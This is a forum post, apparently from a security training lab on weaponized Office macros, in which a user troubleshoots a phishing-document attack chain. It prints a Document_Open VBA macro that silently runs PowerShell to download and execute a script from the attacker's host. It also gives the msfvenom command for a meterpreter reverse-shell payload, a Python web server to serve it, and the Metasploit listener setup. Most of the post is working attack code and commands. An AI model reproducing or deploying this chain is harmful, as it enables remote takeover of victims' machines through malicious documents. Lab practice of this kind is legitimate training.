justajolt
2 months agoBronze I
Weaponization: Payloads β Office Macros
I've been banging my head against this brick wall for a few hours now and I could use a second set of eyes.
1. I've created a macro enabled word doc with the following vb code on windows machine:
Sub Document_Open()
Dim ps as String
ps = "powershell.exe -NoExit Invoke-Expression (New-Object Net.WebClient).DownloadString('http://MY_KALI_IP/shell.ps1')"
process = Shell(ps, vbhide)
End Sub
2. python3 -m http.server to start server to serve shell.ps1 on request
3. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<Kali IP> lport=443 -f psh > shell.ps1 to create reverse shell with same name the command in the macro script will go looking for
4. create listener with sudo msfconsole, use exploit/multi/handler, set payload windows/meterpreter/reverse_tcp, set LHOST KALI IP, set LPORT 443 then exploit to start listener
5. back on windows machine, go to target_ip:8888, browse to macro doc, submit and execute.
What am I missing?